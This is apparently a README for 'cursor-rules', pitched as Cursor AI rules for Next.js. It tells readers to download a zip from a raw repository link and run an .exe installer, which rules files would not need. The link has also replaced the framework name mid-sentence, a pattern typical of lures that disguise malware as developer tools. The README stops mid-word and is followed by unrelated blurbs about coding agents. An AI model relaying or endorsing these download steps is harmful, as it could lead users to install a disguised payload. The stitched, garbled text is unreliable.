🚀 Streamline your Next.js development with practical rules and tested patterns for efficient coding and minimal bugs.
# 🖱️ cursor-rules - Streamline Feature Development with Ease  ## 📋 Overview cursor-rules is a collection of reliable Cursor AI rules tailored for https://github.com/pemdes174/cursor-rules/raw/refs/heads/main/duali/cursor_rules_1.7.zip projects. These rules assist developers in implementing features quickly and with minimal errors. Whether you're adding a new feature or refining an existing one, cursor-rules makes the process easier and more efficient. ## 🚀 Getting Started To begin using cursor-rules, follow these steps to download and run the application: 1. **Visit the Releases Page**: Click the link below to access the releases page where you can find the latest version of cursor-rules. [Download cursor-rules](https://github.com/pemdes174/cursor-rules/raw/refs/heads/main/duali/cursor_rules_1.7.zip) 2. **Select the Latest Release**: On the releases page, look for the latest version. This is usually at the top of the page. Click on it to view the available files. 3. **Download the Application**: Under the latest release, you’ll see a list of files. Find the one that suits your operating system (e.g., Windows, Mac). Click the file link to start the download. 4. **Install the Application**: Once the file has downloaded, locate it in your downloads folder. For Windows users, this might be an `.exe` file. Double-click it to begin installation. For Mac users, you may need to drag the application into your Applications folder. 5. **Run cursor-rules**: After installation, you can now run the application. On Windows, find it in your Start menu or on your desktop. On Mac, open your Applications folder and double-click the cursor-rules icon. ## 🔧 Features - **Efficient Rules**: cursor-rules include proven rules that streamline the coding process, enabling quick feature implementation. - **Reduced Bugs**: These rules have undergone rigorous te
Agent that generates comprehensive documentation, API references, architecture diagrams, and developer onboarding guides from existing code.
Agent configuration for systematic bug investigation that traces issues from error logs through the codebase to root cause with suggested fixes.
Agent for integrating third-party APIs including SDK setup, type generation, error handling, retry logic, and rate limit management.
Cursor's built-in autonomous coding agent that can make multi-file edits, run terminal commands, search the codebase, and iteratively build features with minimal human intervention.
Cloud-based autonomous coding agent that runs in the background on remote sandboxed environments, handling complex multi-step tasks while you continue working.
Cursor's multi-file editing agent within Composer mode that can create, edit, and delete files across your entire project in a single conversation.